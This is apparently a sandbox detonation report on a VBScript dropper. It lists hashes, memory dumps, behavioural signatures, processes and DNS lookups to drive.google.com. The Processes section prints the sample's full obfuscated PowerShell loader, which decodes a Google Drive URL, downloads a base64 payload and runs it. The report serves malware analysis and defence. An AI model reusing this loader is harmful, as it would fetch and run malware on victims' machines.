| SHA256 | c65a000351f8a3603aab5ee8b18cf00646e93e6367ca42f2683bb0a2959567ae |
| SHA512 | 440f27b80f0a8f10ad3a739353b48a22abc78a2dc89f1de38dd07843392dac519e9c5b2929ba8ed4b36be2b380b6ba5a1322eed092d187ddd6cbc89f93b9467a |
C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt
| MD5 | 299ec4fb4a084dedc9065ae7622530bb |
| SHA1 | 409a6c497183781a475e76d2951ec71991c26631 |
| SHA256 | e3a18aeca1d2d66c8514cfb98fc880ee56b3235566f6e2183c38d443195bd057 |
| SHA512 | f1877fe9641d424e439ba3f478d161fa2637ae48a67246e9a8f5ff7b3a6dfdb3a8c96c6734f7880ef0a61c90fe1c47288738e0ed092110afc933e1f0dcab2247 |
C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt
| MD5 | df6e4430fa9ef1abcc37130117573e77 |
| SHA1 | 8ac3f18ee03d9ba2370a36818bc6010808f35988 |
| SHA256 | f232b532f047b23573a2e4d0999bb3c5baff7d634b06cdd0ac7f00f63518109e |
| SHA512 | 47cade5de76f082da24f60eb9eb0242bbef69d736d834a28e5a3f39d77e69aebf16295c6d91a3698b587a6074d9085d92d6c8790b6d6178e3cfee18c512dfbaf |
memory/1876-346-0x000007FEF5D6E000-0x000007FEF5D6F000-memory.dmp
memory/1876-348-0x00000000022D0000-0x00000000022D8000-memory.dmp
memory/1876-347-0x000000001B610000-0x000000001B8F2000-memory.dmp
memory/1876-349-0x000007FEF5AB0000-0x000007FEF644D000-memory.dmp
memory/1876-350-0x000007FEF5AB0000-0x000007FEF644D000-memory.dmp
memory/1876-352-0x000007FEF5AB0000-0x000007FEF644D000-memory.dmp
memory/1876-351-0x000007FEF5AB0000-0x000007FEF644D000-memory.dmp
memory/1876-353-0x000007FEF5AB0000-0x000007FEF644D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y6H0F3SJSWIAZ7Y2PWUO.temp
| MD5 | e9348c670e88fa2a1c2d54b0d2703c91 |
| SHA1 | b8cd430109dc02ab7680747127e56e48b5683c4f |
| SHA256 | 4521f9c12d9bc003a8f0da1cca9979fdcddb0b3539448456b475ecb8d35838ba |
| SHA512 | 245bad4c87378e6d0ebec685277db4c790615f435edba9c5f0e98a48cca6455aa1c87d03e5b4ac282817ec6d52bcfe011770deff83f6695e66abfbdc76bba29c |
C:\Users\Admin\AppData\Roaming\Restauratrens.Alb
| MD5 | c990e3d829b26e351547c77df1bc5953 |
| SHA1 | df0592b47bea01cc3199012205c3bf55545fb09e |
| SHA256 | f2108dfabed7091171e5c3219a76a955ae6b4d4632d685ead292f346ecf99822 |
| SHA512 | f1f78838d6aae755d74f5dcb21b3d5b8f9100937caae28e0c7fdf6dcc39e382bc02e7040bdc4b682ac7148c987bb59f86aa3c36fa769dd85b40a0543361789da |
memory/280-359-0x00000000066A0000-0x0000000009DFA000-memory.dmp
memory/1876-360-0x000007FEF5AB0000-0x000007FEF644D000-memory.dmp
memory/1876-361-0x000007FEF5D6E000-0x000007FEF5D6F000-memory.dmp
memory/2640-384-0x0000000000A40000-0x0000000001AA2000-memory.dmp
memory/1876-385-0x000007FEF5AB0000-0x000007FEF644D000-memory.dmp
memory/2640-386-0x0000000000A40000-0x0000000000A82000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-19 09:26
Reported
2024-06-19 09:28
Platform
win10v2004-20240508-en
Max time kernel
147s
Max time network
151s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2380 wrote to memory of 1388 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2380 wrote to memory of 1388 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1388 wrote to memory of 2404 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 1388 wrote to memory of 2404 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FA46969-OVERSEAS 2024.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle 1 "cls;$Clergywoman = 1;$Trubadurs='ring';$Didepside59='S';Function Solidariske($Viveths){$Bataljons=$Viveths.Length-$Clergywoman;$Anticonventionalist=$Didepside59+'ubst'+$Trubadurs;For( $Spiralism=7;$Spiralism -lt $Bataljons;$Spiralism+=8){$anstrengelsens+=$Viveths.$Anticonventionalist.Invoke( $Spiralism, $Clergywoman);}$anstrengelsens;}function Sittas($Aners){ . ($Cyclonology) ($Aners);}$Mishits=Solidariske 'Pryg.stM Theat oTracheozAfrohaaiNonperclEmulgerlBrandskaPsy.olo/,elebre5Anlgsre.Suckedl0Legetj. Adfrdss( Pla erW YppedeiStr.alenV lorizdTankageoHypokonwOutwilesPaleoen DamoklNSignifiTArbejde Abduce1Pas.ern0Erfarin.Farfets0Idiochr;Dismaya Spkn,nWPermitti.avelannTorsion6Brndest4 Standt;Buskvks LammeboxNappish6 ekster4lsterne;,teadim StripaerMisnomev Puf.op: Reacce1Acciden2Navlebi1St,icis.Pit pro0Syndact)Prionus MoonrisGBeermakeSa iggrcSurrogak SpeciaoOverfat/Vanda i2Hy,rosa0Hex,cti1Blastop0M dlber0Unusage1Bombast0Tho.ung1Ildsluk PhytocFGibbetsiBluebilrpropagaemusi ekfmedtnktoNonfi rx Pre,dv/ Aurifi1Csectst2inventa1samplin.Invitin0Svbesla ';$Staphylinoidea=Solidariske 'EvaginaU Aalb.tsMicrofie Florifr Flades-A,jobasAAngariag JollereP eventnSilverrtdramati ';$Bulbideres=Solidariske 'Staalvgh UddanntZumat ctVrgelshpToyshopsAuktion:Bereave/Vilipen/UberegndMultifor VirkemipromissvVelformeBussero.G mpedlgprofi.eoMantlepoWesterngKibbutzlJvn rafe Inscri. rugergc fderaloCromb emMisdeli/TeleolouArchvisc mat.oh? Bl dpleAngivelxLogf lep BajereoSmmometrEufor stKuppets= Nunc edHusf.deoFornemmwOverenunOmgangslClearinoCaducaraHeksesadAvecsgi&Hstenc iAndelsbd Urbane=,ftrred1gamelanx oleremHPseudofxTubaphovOvulary0O,erappX ormaldIDatakopoLokalplJ EgyptopSnderknlFell,teRBacteriz etsindm Mongr.FMaltlleT ctinozZ FodersRUnpulsa3Doryp o1,dstjerpEutychiGAlarmf fBelzebu0 Unse.sxParitetJEmpiricEApachitv PosttaRU.ungunAExcimeri Bagpi.n Idiosy ';$Termografens=Solidariske ' Blatti>Trendin ';$Cyclonology=Solidariske 'HeksejaiSaneneseTicktacxCom,ove ';$Kenns='Overkommer75';$Shandyism52 = Solidariske 'NonprogeAttitudc MalleehGenerero P.cher slavel % StorsvaAfm.litp Pictu,pAgurketdI,deslua tilletinterp.aRefires%Bed bes\F,rbrdrRUbesluteHyper,rsRimalfrtBevillia DefiniuFred gsr Ret,ska BlgekatDingeinrfor andeTerrnlbnCirkusesEsca,te.lyratelAFetaostlGriskesbkredito Dekagr.&Re.onst&Gratule Paalsn,eSammensckeysterh Korts.oTragic, klamphutstbe ie ';Sittas (Solidariske ' Tilmel$Fore.igg hemat lM,riavio MagnetbSteffe aSol,difl,ovings:NonfactSPyribo.p StylterSubjectaTrichotu LoverlcBitrykkhUnderkrl.onintee Teknold.lendef=Formul ( Toas,ycBaryle.m Conon.dskaglen emulge/Indslu,c ultraf Hyper y$ HeraclS.ioresihEngraula LykkernR.duktidVan,dicyUdebleviFriktios ,harlim oebma5Paddyis2Fa.tasi)Vddende ');Sittas (Solidariske ' Coerce$AvaischgSn,halel Chauvio Interab Udl,dnaSelvejelIsenkrm:D,cibelF SpeakaaShortstdPlumyaveDansantrSursdessNonconvk EksamiaRadioblbInsignieHns,husr FdningnKodoguse Hoberfs betwit=Insinu.$UdmugniBKundemduPrf,renlNonqu lbVrdilstiLeefpardberrigaeLivsener AnticoeRepre,ssNdigkoo.Erhverss TilflypOutfindlClappeoiSvumpuktdecos,a(Monothe$SuburbaTAgatewae AnnularKoltunnmInt,rraoStrati,gGr,vsorrTranquiaI stigafIns,mine ervesnBilleprsF rsvar) Ve bal ');Sittas (Solidariske 'Seismis[FedtldeN BrugereRestlagtForvetd.CarolinS,lyedesetilegnerKonkludv MystifiS rewdncNonvoteeslgtsp P.rumbasoAlgegifiSpatlern VristetPremenaMStoragtaRepacefnWictoraaVaku.mpgCancer eMolasserAfs,emp] Raclet:specime:ZinkbleSIndtrkpePhlegmac ByggetuVinegarrFractioiS,akalhtDatabrayFuturumPDeponerr Bitryko FluviotSeamersoResewnhc,riststoSchchtnlExsp li Poachie=Nonincl Protria[MyomancNGra,spue KnighttSekunda.ExudatoSJordfsteCyther cPartietu Opinior A,glutiHypod.rt RaajoryF,ngsnoPKritisarcondenso btrusitthirtysounshrinc snoh,loDisparklsystemoT alismaybasguitp haabe eOrn,rym]Overgra:Chilopo:BankbooTBen eedlSk.tteosAarsrap1smulers2 Reproa ');$Bulbideres=$Faderskabernes[0];$Cajeputol= (Solidariske 'Lettes $ArthrobgKogeplalT.lsvaroMetamorb NeonetadannebrlTabulat:PewmateMSoergesiarbejdes MicrodyRehu bloHandi.akUnprosoeE.termedShallow=Porr.maN strutteInconsowNo.corr-PersonaOCatabapbsodomitjneuraleeant goncLetlevetPreappr CanfulsSAggr.mmy SurrejsFordelitEunuchieT tjanam.fperso. beskydNste.cile Docklat,ortkas.C reddaWTab ureeHarmonibStudeopCstiknarlRagelsei GrindeeDeterminCoin wet');$Cajeputol+=$Sprauchled[1];Sittas ($Cajeputol);Sittas (Solidariske 'Maskuli$Hippo.hMReserveiBorddamsCountery ThrawioMbelpolkEnligsteFamiliadRoug,sh.InddataHSubaroueRaftl.kaDistintdStatskae CopperrCiselrisT,dsats[Membran$OrlovsoSPa ementUnderbiar dsefjpMideskuhEmbedsmyTempelilBore oriPraktisn DominaoHegn neiKunstindMakrot.eJoniseraMakrore]Homebre=Interso$fistu aM BatteriDekkonosNonjurehDiauheriBarslertPalapals Brixvo ');$Uforsvarligheden=Solidariske '.orovad$Uncha.tMDiduncui BrolggsGenfi,dyMo sieuoGaa.dhakKnejpereI tratidCanonis. Plas,vDVenereooSandartwPrevllinYdedygtl ToholdoMu,chieaYderpardSadduk FGu lereiCynghanl Ga vaneFlygele(doping $ .estanBOutjutsuSlvholdlShintorbopslm,iiGuaymi.dDip.skoeC,efdelrCashboyeEksaminsUnrepro,Matro e$ OverkoHNann.ttuShoddywsEl,evtee Faconnj Sund,eeVagab nrLavis.e)Bortvlg ';$Husejer=$Sprauchled[0];Sittas (Solidariske ' orstzo$Begivengluta islV.catiooMeshuggbSwah,lia SatinflInter,e:AnordniRWalkyrieDissonedXylocopeamla racGardenwopuncheorCancellaBlockietMi kicke Floc i=un.arie(PostillT RullesePoutiersRepetitt dime.a- SkafthP.rwinnraZe zuictch etaehLensaf, Skruden$GasolinHRester u Aktieks ChartaeRegistrj Avoi,ee BycentrSnorkso) Rigtig ');while (!$Redecorate) {Sittas (Solidariske 'Tropica$Gu fadegSanemo,lBibbasmo Ma chsb F,orisadrik ellClogwoo: SubfunWS,ltetjhGsternei ectocen Swagge=Strkban$BjerglatWaterlerSkrllemuVentekjeBerigni ') ;Sittas $Uforsvarligheden;Sittas (Solidariske ' ThecapSK.llagetGooseneasognekirSvanshatRebathi-PotensfSPorkpenlWamese,eguthreyeoutpricptermobe Gharn o4Refluxe ');Sittas (Solidariske 'Archido$RedesiggtablemalTil.ysnoAfpolitbKnight.a DgisuclFllessk:AdfrdsvR ImmunoeAmplicads bclaueSweaterc JoulesoBuestrgrBegotteaSkiltnit Bawdrie Malpi.=Klarere( Vild.sTfo.sonieAuhemits Trkl.st P roti-UndermuP valvulaBimb,estEndoglohsuborns A olian$ CoharmH.dgrdenuWincerssMellemkefo.kepejbookbineGa.turbrclocked)Sulf,va ') ;Sittas (Solidariske 'Valetho$QuailhegDod,canlKalciumo SkrvebbCyneg.taCleatunl,elioty:SelfishPacutesmlCopperpu DirectnAvionickDvorakseDuffe cd Odouro=Cardiag$ UncoatgU,deputlRedistioSpillwabPetrosuaToxic,plProd,kt:compresFNervomurarrangeyAntifatnSpil.evsRen,ejee InformnPre,egidLa,njkjeBruskha+Foromta+Dds ill%Allomuc$FoliestF MarnasaGriecepd teg,ineGizdhubrTantrafsSylternk Pla abafribillbFootcaneDirectorlxxmas.n St abieChemi tsPar,ici.DezincicSdefdsloMillefluAbsurdinKonstantLnindeh ') ;$Bulbideres=$Faderskabernes[$Plunked];}$Frysepunktssnkningers=336625;$Besyngende=28489;Sittas (Solidariske 'Selvmde$PigmentgSpi.dvalClimatooDefinitbSerrul.aGisnedelSono.an:SnusdaaA elieffmRavn kriOctroyatPaakrveapensionbFrostinh StttevaScoundr Eluvium= Daaru MedidiiGCivilwoefatssnat .orsto-Las.oenCWhiteeyoTelegranOlsharptParaphyeoutla,dn Smrgaatornit o Octago$InsinceHG,aasteuFlykaprsClairseeret,ingjElevatoeMantlinrBargema ');Sittas (Solidariske ' al,mos$lakf,brgDanserulCeraunooCenternbAngstroa san bll Taxame:Kinsen.Dl,geriteMultimolCon.enitUfravigoG,ycemiiPlasmoldEntosthe OpposeiBos ter1Overbef7Deterio1Temporo Klippee=Bundvan ddleda[ Rotte.S UautoryuniverssArve,latHdersmne J.rdndmSamfun .e,hegneCBronkosoBi ragsnAdipictvrh,zomoe Rotte rSbeurtetIndstte]Koers e:E,somhe: ,ntralF.usicolrSyncom o wi.nowmSubordiBColone.a Komedis aggregeTrves.r6 Kod.ci4 A,bumeSpalaeottHjemf.rrScoinsoi ugrsbonAntikvagpronymp(Ulovlig$ udarbeAUnsecurmtilkrseiBrom,prtLiripipaCounterbSyltninhOverstaaSkyggem) Alpini ');Sittas (Solidariske ' ainfu$ PockytgBoetstilRepudiao BellicbUn.emonaE ologil Ud.app:Hy,notiS NotemuaForskrkd.omputedMngderpuKwa zadk mrkatseOr,tresr Stedsse NeuropsBremse, B.ghand=U,placi ,remme[Sukke fSKaliphuyF.rsvarsSortsynt UdspejeSubartimcytolog.InsuffiTAntrit,e dpresnxExploretOmelett. visemaEUnd rstnFrimrkecSubstrsoManiabldProportiTrombocnDopingdg Pe ige]Argumen:Lyseslu: MetcalATandbylS erpenCPrognosIKippediIRavnsor.ExtradiGSpondyleT,olddotSuomivaSOr.entetGlaz ngrLuciferiGrassednLsegrupgUnrepro(Blndeaa$VkkerglDG.lleaseg,effotl Sunnitt Stopplofo.mateiKulturkd springeB.lysnii adeno.1Attaknx7 Chromo1 Keywor)Hobbyis ');Sittas (Solidariske 'Doorbra$Unre.rogIntimeslAandrigoFaktotubFrondesa E.tomel Superm: lakfjedKlavreieStyresybRapsma a ,ertugtPro.esss Ke.misk TranspuBoss.eteTollgatsNaboberpStrmkreiSmoothllsympatil Dik.afechoristnTrangf,eJicaques Skrter= ektifi$BorgerpSSpratteaIneffecd ExtraddKvasteru Gtzrenk Immun,eDa.nemornon.ucteUnderbesRynketf. Ribliks kinemauDemontfbSisyphesUdenbomtSemiquarAgrogeoiDo,mefanFlash.fgKravles(Vaticdi$Ukor ekF Stv,olrAntikkey Arbejds.bmandseFl.tellp Im.lauu fsvalenSekstenkSubsysttRim.nsasGrussefsEndepunnTricenak SelefanKlanhvdiCentrifnTubuleug.aandpae Py,itir PeenedsUnsuper,Catena $ allouBNonfuseeConstrasSk,tteeyForkbsrn SeiningDeneb.le,drtsfonFrimrkedBody.uaeKaloriu) Delega ');Sittas $debatskuespillenes;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 52.111.229.48:443 | tcp | |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt
| MD5 | 5c220ed75280c181214fd09e1eed5be5 |
| SHA1 | 8632a068505754d734915e2cdb4b23fca1324e3b |
| SHA256 | 2c372644fac0b493dc938395727bcb7a2913955dbacbf50b577114ca63e73088 |
| SHA512 | 5422ee3ea40a6d1d9bd3617bc42fc6dbd9589f57e04bb72fa5518df5e64232ccc20ccb0a03b233770537feaffab1070491efd01c42f54f60a63b14da57e1c69a |
C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt
| MD5 | 8f55743455974f961a2b5864f35c10be |
| SHA1 | 8d0aef5285f4d48b85f72dc139f65d37a75fa681 |
| SHA256 | e896daf302a853028fedaefce97714ff5477c66a56507346993e60233d610cb6 |
| SHA512 | e6c68745a173913de592313f99284c553c42e7a3823897c33ab09a846a5af80bc018344f878f18434219eb8f496416a13edccd3c756767a8212d55d9550e1740 |
memory/1388-342-0x00007FFDE6193000-0x00007FFDE6195000-memory.dmp
memory/1388-343-0x0000025733100000-0x0000025733122000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gebpbkxr.2sc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1388-353-0x00007FFDE6190000-0x00007FFDE6C51000-memory.dmp
memory/1388-354-0x00007FFDE6190000-0x00007FFDE6C51000-memory.dmp
memory/1388-355-0x00007FFDE6190000-0x00007FFDE6C51000-memory.dmp
memory/1388-356-0x00007FFDE6193000-0x00007FFDE6195000-memory.dmp
memory/1388-357-0x00007FFDE6190000-0x00007FFDE6C51000-memory.dmp
memory/1388-358-0x00007FFDE6190000-0x00007FFDE6C51000-memory.dmp